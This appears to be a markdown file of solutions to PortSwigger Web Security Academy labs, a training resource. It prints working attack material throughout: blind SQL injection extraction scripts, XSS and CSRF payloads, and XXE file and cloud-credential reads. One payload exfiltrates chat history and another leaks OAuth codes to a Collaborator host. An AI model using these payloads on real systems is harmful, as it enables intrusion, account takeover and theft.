Skip to content

Latest commit

 

History

History
1938 lines (1195 loc) · 58.5 KB

burp-academy.md

File metadata and controls

1938 lines (1195 loc) · 58.5 KB

Lab: LAB-NAME-HERE

Target

Discovery

Analysis

Exploitation

Mitigation

SQL injection

Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data

Payload: ' OR 'a'='a'--

Solution:

https://ac621fd21eb2b0e1c082847f00be0097.web-security-academy.net/filter?category=%27%20OR%20%27a%27=%27a%27--

Lab: SQL injection vulnerability allowing login bypass

https://portswigger.net/web-security/sql-injection/lab-login-bypass

Payload: ' or '1'='1

Solution:

curl -s https://ac961fbe1e874560c0a53e2700c50025.web-security-academy.net/login -d 'csrf=02gPIAfYLxmgx07NosP5ChXUji8LZDi0&username=administrator&password=%27+or+%271%27%3D%271'

Lab: SQL injection UNION attack, determining the number of columns returned by the query

https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns

Payload:

' union select null,null,null--

Lab: SQL injection UNION attack, finding a column containing text

https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text

Payload:

' union select null,'We2TqZ',null--

Lab: SQL injection UNION attack, retrieving data from other tables

https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables

Payload:

' union select username,password FROM users--

Lab: SQL injection UNION attack, retrieving multiple values in a single column

https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column

Payload:

' union select null,concat(username,password) FROM users--

Lab: SQL injection attack, querying the database type and version on Oracle

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle

Payload:

' UNION SELECT banner,null FROM v$version --

Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft

Payload:

' union select @@version,null--%20

Lab: SQL injection attack, listing the database contents on non-Oracle databases

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle

List tables:

%27%20union%20select+TABLE_NAME,null+FROM+information_schema.tables--

List column names from selected table:

%27%20union%20select+COLUMN_NAME,null+FROM+information_schema.columns+WHERE+table_name+=+'users_dxfmgd'--

List users and passwords:

%27%20union%20select+username_ppvobv,password_vddlrf+FROM+users_dxfmgd--

Lab: SQL injection attack, listing the database contents on Oracle

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle

Lab: Blind SQL injection with conditional responses

https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses

Solution:

#!/usr/bin/python3

# (http://docs.python-requests.org/en/latest/)
import requests
from requests import get
import sys

s = requests.session()

for j in range(1,21):
    for i in range(48,122):

        payload = "sA0oQJbDuua9SbuH'+AND+ASCII(SUBSTR((SELECT+Password+FROM+Users+WHERE+Username+%3d+'administrator'),"+str(j)+","+str(j)+"))="+str(i)+"--+"
        cookie = dict(TrackingId=payload)
        r = s.get("https://0a07001f038c1271c616462c001d0021.web-security-academy.net/filter?category=Pets", headers=headers, cookies=cookie)

        if 'Welcome back!' in r.text:
            print(chr(i))
            break

Lab: Blind SQL injection with conditional errors

https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors

Solution:

#!/usr/bin/python3

# (http://docs.python-requests.org/en/latest/)
import requests
from requests import get
import sys

s = requests.session()

for j in range(1,21):
    for i in range(48,122):

        payload = "YHjR3e0Tqh1FkBsZ' AND (SELECT CASE WHEN (ASCII(SUBSTR(Password, "+str(j)+","+str(j)+")) = "+str(i)+") THEN TO_CHAR(1/0) ELSE 'a' END FROM users WHERE username='administrator')='a"
        cookie = dict(TrackingId=payload)
        r = s.get("https://0a3d009603a90aa2c3a970580085001c.web-security-academy.net/filter?category=Gifts", cookies=cookie)

        if r.status_code == 500:
            print(chr(i))
            break

Lab: Visible error-based SQL injection

https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based

Payload:

' AND CAST((SELECT password from users LIMIT 1) AS bool)--

Lab: Blind SQL injection with time delays

https://portswigger.net/web-security/sql-injection/blind/lab-time-delays

Payload:

;SELECT+pg_sleep(10)--

Lab: Blind SQL injection with time delays and information retrieval

https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval

Solution:

#!/usr/bin/python3

# (https://docs.python-requests.org/en/latest/)
import requests
from requests import get
import sys
import datetime

s = requests.session()

for j in range(1,21):
    for i in range(48,122):

        payload = "'%3b SELECT CASE WHEN (ASCII(SUBSTRING(Password, "+str(j)+","+str(j)+")) = "+str(i)+") THEN pg_sleep(7) ELSE pg_sleep(0) END FROM users WHERE username='administrator'--"
        cookie = dict(TrackingId=payload)
        start = datetime.datetime.now()
        r = s.get("https://0a6e00a603ca30c5c0067c0a00470033.web-security-academy.net/filter?category=Gifts", cookies=cookie, timeout=8)
        stop = datetime.datetime.now()
        elapsed = stop - start

        if elapsed > datetime.timedelta(seconds=7):
            print(chr(i))
            break

Lab: Blind SQL injection with out-of-band interaction

https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band

Lab: Blind SQL injection with out-of-band data exfiltration

https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration

Lab: SQL injection with filter bypass via XML encoding

https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding

XSS

Lab: Reflected XSS into HTML context with nothing encoded

https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded

Payload: <script>alert(1)</script>

Solution:

https://ac301f9a1feab630c06628c800590004.web-security-academy.net/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Lab: Stored XSS into HTML context with nothing encoded

https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded

Payload: <script>alert(1)</script>

Solution:

curl -s https://ac441f571ee3c7f6c0d47ecf009500b5.web-security-academy.net/post/comment -d 'csrf=JjGC1fbulzEdU0pPT6g2Ty2tBWcjoEaq&postId=9&comment=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&name=sdf&email=sdfsd%40sdfsdfsdf.er&website=http%3A%2F%2Fdfsd.df'

Lab: DOM XSS in document.write sink using source location.search

https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink

Payload: "><script>alert(1)</script>

Solution:

https://aca31fc71ff01052c05f047b00ea000b.web-security-academy.net/?search=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Lab: DOM XSS in innerHTML sink using source location.search

https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sink

Payload: <img src=1 onerror='alert(1)'/>

Solution:

https://ac9b1f881fdbcb19c0c5026f00d3008b.web-security-academy.net/?search=%3Cimg+src%3D1+onerror%3D%27alert%281%29%27%2F%3E

Lab: DOM XSS in jQuery anchor href attribute sink using location.search source

https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-href-attribute-sink

Payload: javascript:alert(document.cookie)

Solution:

https://accb1fd31e8cc586c08e432600d300df.web-security-academy.net/feedback?returnPath=javascript:alert(document.cookie)

Lab: DOM XSS in jQuery selector sink using a hashchange event

https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-selector-hash-change-event

Payload: <iframe src="https://acc21f141f0e6cfcc070115f007d004e.web-security-academy.net#" onload="this.src+='<img src=1 onerror=print()>'">

Solution:

Entice user to visit malicious/3rd party server with planted payload above.

Lab: Reflected XSS into attribute with angle brackets HTML-encoded

https://portswigger.net/web-security/cross-site-scripting/contexts/lab-attribute-angle-brackets-html-encoded

Payload: " autofocus onfocus="alert(1)

Lab: Stored XSS into anchor href attribute with double quotes HTML-encoded

https://portswigger.net/web-security/cross-site-scripting/contexts/lab-href-attribute-double-quotes-html-encoded

Payload: javascript:alert(1)

Solution (encoded comment's request body):

csrf=0U6uy5VkRelkARZmhPEM6i1Gg6xBgqq3&postId=8&comment=QWE&name=QWE&email=abc%40xyz.com&website=javascript%3Aalert%281%29

Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded

https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-string-angle-brackets-html-encoded

Payload: ';alert(1)//

OAuth authentication

Lab: Forced OAuth profile linking

Vulnerability

Vulnerable component: OAuth client application

Exploitation technique: CSRF against OAuth client application

Impact: OAuth client application account takeover

Implementation issue in OAuth client application. The application does not contain proper nonce parameter during authorization request making OAuth flow vulnerable to CSRF attack. Successful exploitation of the flaw allows to associate attacker's controlled account on the identity provider with a victim's account on OAuth client application resulting in an account takeover.

Exploitation

  1. An attacker initiates OpenID Connect flow on OAuth client application (blog).
  2. Halt the flow (from [1]) just before OAuth service redirects the browser back to OAuth client application redirect_uri.
  3. Prepare CSRF bait site with the following content (where CODE value is taken from the response from [2]:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://aca71f891eeb2a5bc1beada2008700a3.web-security-academy.net/oauth-linking">
      <input type="hidden" name="code" value="CODE" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Trick the victim to vist the prepared site.

Mitigation

Implement and properly handle state (nonce) during OAuth authorization request:

GET /authz?client_id=ID&response_type=CODE&scope=SCOPE&redirect_uri=REDIRECT_URI&state=NONCE

Lab: Authentication bypass via OAuth implicit flow

Lab: OAuth account hijacking via redirect_uri

Solution:

  1. Prepare the content of exploit server:
    <img src="https://oauth-0ac200710489f4088294a907025b0040.oauth-server.net/auth?client_id=ocyb4qnsgvstf8de8e07i&redirect_uri=https://xbcl3q90bijx8paegc08b6i6yx4osig7.oastify.com&response_type=code&scope=openid%20profile%20email">

  1. Notice the OAuth2 code sent to Collaborator

  2. Log in as admin:

    https://0a6200db0411f49482bdab9d00270000.web-security-academy.net/oauth-callback?code=O7aYu_i8eMVV6CcCQwb0-SDTRLPQ273XIKCmYiTgvrs

XML external entity (XXE) injection

Lab: Exploiting XXE using external entities to retrieve files

https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

Vulnerability

Exploitation

Payload:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Lab: Exploiting XXE to perform SSRF attacks

https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf

Payload:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Cross-site request forgery (CSRF)

Lab: CSRF vulnerability with no defenses

Target

https://portswigger.net/web-security/csrf/lab-no-defenses

Vulnerability

Plain CSRF vulnerability. When you see a site with cookie-based sessions and there is no CSRF tokens used the good chances are the site is vulnerable.

Exploitation

  1. Prepare CSRF bait site with the following content:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://accd1ff41f28b885c0cf05e5005a00b1.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="abc&#64;xyz&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Trick a victim to vist the prepared site.

Mitigation

Use anti CSRF mechanism offered by the web framework you're using. Alternatively, implement robust anti CSRF mechanism (e.g. CSRF tokens) by your own.

Lab: CSRF where token validation depends on request method

Target

https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method

Vulnerability

An example of badly implemented anti CSRF mechanism. CSRF token is in place but it is only verified by the application on POST method processing. The application allows GETs as an alternative and does not verifies CSRF token while processing it.

Exploitation

  1. Prepare CSRF bait site with the following content:
<img src="https://ac721fed1e1e6c0bc062176100e300f5.web-security-academy.net/my-account/change-email?email=abc5%40xyz.com">
  1. Trick a victim to vist the prepared site.

Mitigation

Make sure to always verify the existance and freshness of CSRF token.

Lab: CSRF where token validation depends on token being present

Target

https://portswigger.net/web-security/csrf/lab-no-defenses

Vulnerability

An example of badly implemented anti CSRF mechanism. CSRF token is in place but it is only verified by the application when it is present.

Exploitation

  1. Prepare CSRF bait site with the following content (note that CSRF token was removed):
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://ac5c1fb81e71a616c03876ae00740061.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="abc&#64;xyz&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Trick a victim to vist the prepared site.

Mitigation

Make sure to always verify the existance and freshness of CSRF token.

Lab: CSRF where token is not tied to user session

Target

https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session

Vulnerability

An example of badly implemented anti CSRF mechanism. CSRF token is in place but tokens arge generated in one global pool and are valid for every session.

Exploitation

  1. Log in as a carlos user
  2. Retrieve CSRF token for carlos with (where SESSION) is value of carlos session id:
$ curl -s --cookie session=SESSION https://acd81fd81e79befec0c22e7b00da004e.web-security-academy.net/my-account | grep \"csrf | awk -F"value" '{print $2}' | cut -d '"' -f2
  1. Prepare CSRF bait site with the following content (where TOKEN is an aoutput from command from [2]):
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://acd81fd81e79befec0c22e7b00da004e.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="changed&#64;abc&#46;com" />
      <input type="hidden" name="csrf" value="TOKEN" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Trick a victim to vist the prepared site.

Mitigation

Generate and use only session specific CSRF tokens valid only for this particular session.

Lab: CSRF where token is tied to non-session cookie

Target

https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie

Vulnerability

Exploitation

url -d -s --cookie "session=vYm5cgNQ2E0iquIlRGbLN8FHHRCK4aJg;csrfKey=5wJWeNz38ZYTHW6zHASMDvbVn31Ip8e5" https://acce1fae1e59e5efc09a2f1900d800bb.web-security-academy.net/my-account | grep name=csrf | awk -F"value=" '{print $2}' | tr -d '>'

<html>
  <body>
  <img src="https://acce1fae1e59e5efc09a2f1900d800bb.web-security-academy.net/?search=trash;%0d%0aSet-Cookie:%20csrfKey=5wJWeNz38ZYTHW6zHASMDvbVn31Ip8e5">
  <script>history.pushState('', '', '/')</script>
    <form action="https://acce1fae1e59e5efc09a2f1900d800bb.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="changed&#64;abc&#46;com" />
      <input type="hidden" name="csrf" value="6e1mTbsHYSac7ZxYPVuLQUQLv6qgrLNK" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Mitigation

Lab: CSRF where token is duplicated in cookie

Target

https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie

Vulnerability

Exploitation

<html>
  <body>
  <img src="https://ace51ff81ffda275c0e43c33006900b1.web-security-academy.net/?search=trash;%0d%0aSet-Cookie:%20csrf=5wJWeNz38ZYTHW6zHASMDvbVn31Ip8e5">
  <script>history.pushState('', '', '/')</script>
    <form action="https://ace51ff81ffda275c0e43c33006900b1.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="changed&#64;abc&#46;com" />
      <input type="hidden" name="csrf" value="5wJWeNz38ZYTHW6zHASMDvbVn31Ip8e5" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Lab: SameSite Lax bypass via method override

https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-lax-bypass-via-method-override

Solution:

<script>
document.location="https://0a6f005e035ef74580ed03a600160080.web-security-academy.net/my-account/change-email?email=abc%40xyz.com&_method=POST"
</script>

Lab: SameSite Strict bypass via client-side redirect

https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-client-side-redirect

Solution:

<script>
document.location='https://0a07006203f1203f80b13fc900540009.web-security-academy.net/post/comment/confirmation?postId=../my-account/change-email?email=cba%40xyz.com%26submit=1'
</script>

Lab: SameSite Strict bypass via sibling domain

https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-sibling-domain

Detecting vunerability:

  1. Launching CSRF attack when session cookie was set as SameSite=Strict seems hard at first look especially if we're up not only to forge the request in context of the victim, but also extract his chat history.
  2. After closer inspection we discover that:
  • websocket is used and WS handshake is not secured againist CSRFs in any additional means (only via SameSite=Strict as all other requests)
  • server leaks via Access-Control-Allow-Origin, https://cms-0ade00e504db0f6c81bbe3e40093003e.web-security-academy.net subdomain. Which in context of SameSite protection is on the same site :)
  • there is reflected XSS at https://cms-0ade00e504db0f6c81bbe3e40093003e.web-security-academy.net

Exploitation:

  1. Launch WS handshake CSRF on a victim via reflected XSS at https://cms-0ade00e504db0f6c81bbe3e40093003e.web-security-academy.net:
<form action="https://cms-0ade00e504db0f6c81bbe3e40093003e.web-security-academy.net/login" method="POST">
<input type="hidden" name="username" value="<script>var ws = new WebSocket('wss://0ade00e504db0f6c81bbe3e40093003e.web-security-academy.net/chat');ws.onopen = function() {ws.send('READY');};ws.onmessage = function(event) {fetch('https://8enw61cbetm8b0dpjn3jehlh187zvsjh.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});};</script>" />
<input type="hidden" name="password" value="abc" />
</form>
<script>document.forms[0].submit()</script>

Lab: SameSite Lax bypass via cookie refresh

https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-cookie-refresh

Lab: CSRF where Referer validation depends on header being present

Target

https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present

Vulnerability

Exploitation

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
 <meta name="referrer" content="never"> 
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://acf21faa1e585ed3c0ef2f7f005d006c.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="abc111&#64;xyz&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Mitigation

Lab: CSRF with broken Referer validation

Target

https://portswigger.net/web-security/csrf/lab-referer-validation-broken

Vulnerability

Exploitation

Header:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Referrer-Policy: unsafe-url

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/?ac021f8c1ed56638c0544264006900a4.web-security-academy.net')</script>
    <form action="https://ac021f8c1ed56638c0544264006900a4.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="abc111&#64;xyz&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Mitigation

Access control vulnerabilities

Lab: Unprotected admin functionality

Target

Vulnerability

Exploitation

curl https://ac4d1fbb1eaed8dcc00d16c100c800cb.web-security-academy.net/robots.txt
curl https://ac4d1fbb1eaed8dcc00d16c100c800cb.web-security-academy.net/administrator-panel/delete?username=carlos

Mitigation

Lab: Unprotected admin functionality with unpredictable URL

Target

Vulnerability

Exploitation

curl -s https://acc01f421fc75897c08337b3009f0006.web-security-academy.net/ | grep admin
curl -s -x 127.0.0.1:8081 https://acc01f421fc75897c08337b3009f0006.web-security-academy.net/admin-1lqn53/delete?username=carlos

Mitigation

Lab: User role controlled by request parameter

Target

Vulnerability

Exploitation

  1. Authenticate in the app as wiener:peter

  2. Standard Match and replace (Burp -> Proxy -> Options -> Match and Replace) fails to replace false to true in a cookie so we use this extension: https://github.com/PortSwigger/match-replace-session-action for that.

With this trickery (i.e. exposing Burp session handling engine for command line tools) we can solve this in one shot:

curl -k -x 127.0.0.1:8081 https://ac111f1d1fb6a221c142c01400b40093.web-security-academy.net/admin/delete?username=carlos

This replaces Admin cookie value from false to true.

Mitigation

Lab: User role can be modified in user profile

Target

https://portswigger.net/web-security/access-control/lab-user-role-can-be-modified-in-user-profile

Vulnerability

Broken access control.

Exploitation

curl -L -k -x 127.0.0.1:8081 https://ac7e1ffa1eb31a27c0a9179d002400d3.web-security-academy.net/admin/delete?username=carlos -d '"roleid": 2'

Mitigation

Role should be bound on the backend to the specific session. It shouldn't be possible to modify it via roleid parameter.

Lab: URL-based access control can be circumvented

Target

https://portswigger.net/web-security/access-control/lab-url-based-access-control-can-be-circumvented

Vulnerability

The backend supports legacy X-Original-URL header. Details here.

Exploitation

curl -H 'X-Original-URL: /admin/delete' -L -k -x 127.0.0.1:8081 https://ac471fb31f0ddf40c0ee5cda006b0015.web-security-academy.net/?username=carlos

Mitigation

Drop support for X-Original-URL header.

Lab: Method-based access control can be circumvented

Target

https://portswigger.net/web-security/access-control/lab-method-based-access-control-can-be-circumvented

Vulnerability

Broken access control for GET http method.

Exploitation

curl -L -k -x 127.0.0.1:8081 https://ac911f011eed636ec0b35e63005b00d8.web-security-academy.net/admin-roles?username=wiener&action=upgrade

Mitigation

Lab: User ID controlled by request parameter

Target

https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter

Vulnerability

Exploitation

  1. Set up Burp to provide authentication engine for command line tools (see: here
  2. Log in via browser to the vulnerable application.
  3. Exploit:
KEY=$(curl -s -k -x 127.0.0.1:8081 https://ac551fec1ffeda0ac0d82a8b004e00a0.web-security-academy.net/my-account?id=carlos | grep 'API Key' | cut -d'<' -f2 | awk -F' ' '{print $NF}'); curl -k -x 127.0.0.1:8081 https://ac551fec1ffeda0ac0d82a8b004e00a0.web-security-academy.net/submitSolution -d "answer=$KEY"

Mitigation

Lab: User ID controlled by request parameter, with unpredictable user IDs

Target

https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter-with-unpredictable-user-ids

Vulnerability

Broken access control. Horizontal escalation. GUID for other user (carlos) is leaked in blog content.

Exploitation

  1. Set up Burp to provide authentication engine for command line tools (see: here for details).
  2. Log in via browser to the vulnerable application.
  3. Exploit:
cat > labSolution-user-id-controlled-by-request-parameter-with-unpredictable-user-ids.sh <<'EOF'
#!/bin/bash

URL=https://ac6e1f381f2ddfa3c0f690be00630094.web-security-academy.net

# search thru blog posts to find GUID for user carlos:
GUID=$(for i in $(seq 1 10); do curl -s -k -x 127.0.0.1:8081 ${URL}/post?postId=$i | grep userId; done | grep carlos | head -n 1 | cut -d"'" -f2 | cut -d'=' -f2)

# get carlos API key:
KEY=$(curl -s -k -x 127.0.0.1:8081 $URL/my-account?id=$GUID | grep 'API Key' | cut -d'<' -f2 | awk -F' ' '{print $NF}')

# submit solution:
curl -k -x 127.0.0.1:8081 $URL/submitSolution -d "answer=$KEY"

EOF

Mitigation

Lab: User ID controlled by request parameter with data leakage in redirect

Target

https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter-with-data-leakage-in-redirect

Vulnerability

Badly implemented redirect to /login form. API key is revealed in the response just before redirect.

Exploitation

cat > labSolution-User-ID-controlled-by-request-parameter-with-data-leakage-in-redirect.sh <<'EOF'
#!/bin/bash

URL=https://ac491f001f68727ec11f7815009d002c.web-security-academy.net

# get carlos API key:
KEY=$(curl -s -k $URL/my-account?id=carlos | grep 'API Key' | cut -d'<' -f2 | awk -F' ' '{print $NF}')

# submit solution:
curl -k $URL/submitSolution -d "answer=$KEY"

EOF

Mitigation

Fix the redirect.

Lab: User ID controlled by request parameter with password disclosure

Target

https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter-with-password-disclosure

Vulnerability

No access control at all! Password for every user can be anonymously read by enumerating id parameter at /my-account page.

Exploitation

cat > labSolution-User-ID-controlled-by-request-parameter-with-password-disclosure.sh <<'EOF'
#!/bin/bash

URL=https://aca21fa81e97e6ebc07e978f000c0088.web-security-academy.net
PROXY=127.0.0.1:8081

# create initial (anonymous) session
curl -s -c cookies.jar $URL

# get administrator password
PASSWD=$(curl -b cookies.jar -k -x $PROXY -s $URL/my-account?id=administrator | grep 'name=password' | cut -d"'" -f2)

# get CSRF token:
CSRF=$(curl -k -b cookies.jar -x $PROXY -s $URL/login | grep csrf | cut -d'"' -f6)

# log in via administrator:
curl -k -x $PROXY -b cookies.jar -s $URL/login -d "csrf=$CSRF&username=administrator&password=$PASSWD"

# delete carlos user:
curl -L -k -x $PROXY -b cookies.jar $URL/admin/delete?username=carlos

EOF

Mitigation

Fix that.

Lab: Insecure direct object references

Target

https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references

Vulnerability

IDOR. Unprotected access to /download-transcript/$i.txt files.

Exploitation

Exploit:

cat > labSolution-Insecure-direct-object-references.sh <<'EOF'
#!/bin/bash

URL=https://ac991fdf1e5eb44fc02c03b4002d00b6.web-security-academy.net
PROXY=127.0.0.1:8081

# create initial (anonymous) session
curl -s -c cookies.jar $URL

# get carlos password:
PASSWD=$(for i in $(seq 1 5); do curl -b cookies.jar -s $URL/download-transcript/$i.txt; done | grep 'password is' | cut -d'.' -f1 | awk '{print $NF}')

# get CSRF token:
CSRF=$(curl -x $PROXY -k -b cookies.jar -x $PROXY -s $URL/login | grep csrf | cut -d'"' -f6)

# log in as carlos:
curl -L -k -x $PROXY -b cookies.jar -s $URL/login -d "csrf=$CSRF&username=carlos&password=$PASSWD"

EOF

Mitigation

Only allow authenticated users to view logs.

Lab: Multi-step process with no access control on one step

Target

https://portswigger.net/web-security/access-control/lab-multi-step-process-with-no-access-control-on-one-step

Vulnerability

2nd step of upgrading the privileges is broken and does not require admin's permissions.

Exploitation

Exploit:

cat > labSolution-Multi-step-process-with-no-access-control-on-one-step.sh <<'EOF'
#!/bin/bash

URL=https://ac771fbe1fd10067c07a21b0005e00fd.web-security-academy.net
PROXY=127.0.0.1:8081

# create initial (anonymous) session
curl -s -c cookies.jar $URL

# get CSRF token:
CSRF=$(curl -x $PROXY -k -b cookies.jar -x $PROXY -s $URL/login | grep csrf | cut -d'"' -f6)

# log in as wiener:
curl -L -k -x $PROXY -b cookies.jar -s $URL/login -d "csrf=$CSRF&username=wiener&password=peter"

curl -k -x $PROXY -b cookies.jar $URL/admin-roles -d "action=upgrade&username=wiener&confirmed=true"

EOF

Mitigation

Verify permissions at each stage of multi-step process.

Lab: Referer-based access control

Target

https://portswigger.net/web-security/access-control/lab-referer-based-access-control

Vulnerability

Exploitation

Exploit:

cat > labSolution-Referer-based-access-control.sh <<'EOF'
#!/bin/bash

URL=https://acf51f5f1f5a219bc085490e00580073.web-security-academy.net
PROXY=127.0.0.1:8081

# create initial (anonymous) session
curl -s -c cookies.jar $URL

# get CSRF token:
CSRF=$(curl -x $PROXY -k -b cookies.jar -x $PROXY -s $URL/login | grep csrf | cut -d'"' -f6)

# log in as wiener:
curl -L -k -x $PROXY -c cookies.jar -s $URL/login -d "csrf=$CSRF&username=wiener&password=peter"

curl -L -H "Referer: $URL/admin" -k -x $PROXY -b cookies.jar "$URL/admin-roles?username=wiener&action=upgrade"

EOF

Mitigation

Information disclosure

Lab: Information disclosure in error messages

Target

Vulnerability

Exploitation

cat > labSolution-Information-disclosure-in-error-messages.sh <<'EOF'
#!/bin/bash

URL=https://ac0b1f111f42b8b5c06752a0005c006a.web-security-academy.net
PROXY=127.0.0.1:8081

version=$(curl -s $URL/product?productId=notexistent | grep -i apache | cut -d' ' -f4)

curl -k -x 127.0.0.1:8081 $URL/submitSolution -d "answer=$version"

EOF

Mitigation

Lab: Information disclosure on debug page

Target

https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-on-debug-page

Discovery

curl -s -k -L https://ac571f011f468d17c0f420a700fa0031.web-security-academy.net | grep -i debug

Analysis

Leakage of SECRET_KEY in phpinfo.php page.

Exploitation

curl -s -k -L https://ac571f011f468d17c0f420a700fa0031.web-security-academy.net/cgi-bin/phpinfo.php | grep SECRET_KEY

curl -s -k -L https://ac571f011f468d17c0f420a700fa0031.web-security-academy.net/submitSolution -d 'answer=wx102tvamfn28xd0mf6bc0lfw0omqk4o'

Lab: Source code disclosure via backup files

Target

https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-via-backup-files

Discovery

curl -s https://ac751fc51e0579a9c02018c5003b00f7.web-security-academy.net/robots.txt

Exploitation

wget https://ac751fc51e0579a9c02018c5003b00f7.web-security-academy.net/backup/ProductTemplate.java.bak cat ProductTemplate.java.bak

curl -k -s https://ac751fc51e0579a9c02018c5003b00f7.web-security-academy.net/submitSolution -d 'answer=azgxgeekgrcvqe5lbheei6vqtppb9tuv'

Lab: Authentication bypass via information disclosure

https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass

Solution:

TRACE /admin

# Notice X-Custom-IP-Authorization header in the response

GET /admin/delete?username=carlos
...
X-Custom-IP-Authorization: 127.0.0.1

HTTP Host header attacks

Lab: Basic password reset poisoning

Target

https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning/lab-host-header-basic-password-reset-poisoning

Vulnerability

Lab contains typical password reset scheme: user is providing username/email and reset link is sent to it. If you have access to the provided mailbox you can set a new password.

The issue lies in a fact that reset link is dynamically generated on the backend using Host header provided by the untrusted user.

Exploitation

  1. Learn an email address of your victim(s), e.g. via enumerating registered users. In the lab it is provided: carlos.
  2. Invoke password reset for the victim email/username and manipulate content of Host header:
POST /forgot-password HTTP/1.1
Host: [attacker.controlled.domain.net]
...

csrf=joLaw8RAzKsT6UqhT6X5D2MzlfRk6avZ&username=[victim-email-address]
